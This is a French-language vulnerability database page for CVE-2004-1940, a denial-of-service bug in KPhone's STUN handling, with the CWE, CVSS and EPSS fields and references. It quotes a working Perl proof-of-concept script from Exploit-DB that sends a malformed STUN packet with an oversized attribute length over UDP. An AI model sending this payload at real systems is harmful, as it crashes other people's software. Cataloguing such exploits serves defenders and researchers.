CVE-2004-1940 : Détail

CVE-2004-1940

Overflow
11.43%V4
Network
2005-05-10
02h00 +00:00
2017-07-10
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

sipclient.cpp in KPhone 4.0.1 and earlier allows remote attackers to cause a denial of service (crash) via a STUN response packet with a large attrLen value that causes an out-of-bounds read.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-125 Out-of-bounds Read
The product reads data past the end, or before the beginning, of the intended buffer.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 24011

Date de publication : 2004-04-07 22h00 +00:00
Auteur : storm
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/10159/info A denial of service vulnerability has been reported in KPhone. This issue may be triggered by a malformed SIP (Session Initiation Protocol) STUN message. This is due to insufficient validation of user-specified STUN packet attribute lengths, causing an out of bounds read and subsequent crash. It is not known if this condition could be further exploited to execute arbitrary code, though it has been conjectured that it is not exploitable. #!/usr/bin/perl use IO::Socket::INET; my $buf = join("", "\x01\x01", # BindingResponse "\x00\x01", # MsgLength "A"x16, # GUID "\x00\x00", # Attribute "\x08\x01", # AttrLength "A"x7975 # Value ); my $remote = IO::Socket::INET->new( Proto => 'udp', PeerAddr => '192.168.1.49', PeerPort => 5060); print $remote $buf;

Products Mentioned

Configuraton 0

Wirlab>>Kphone >> Version To (including) 4.0.1

Références

http://marc.info/?l=bugtraq&m=108244325924859&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/10159
Tags : vdb-entry, x_refsource_BID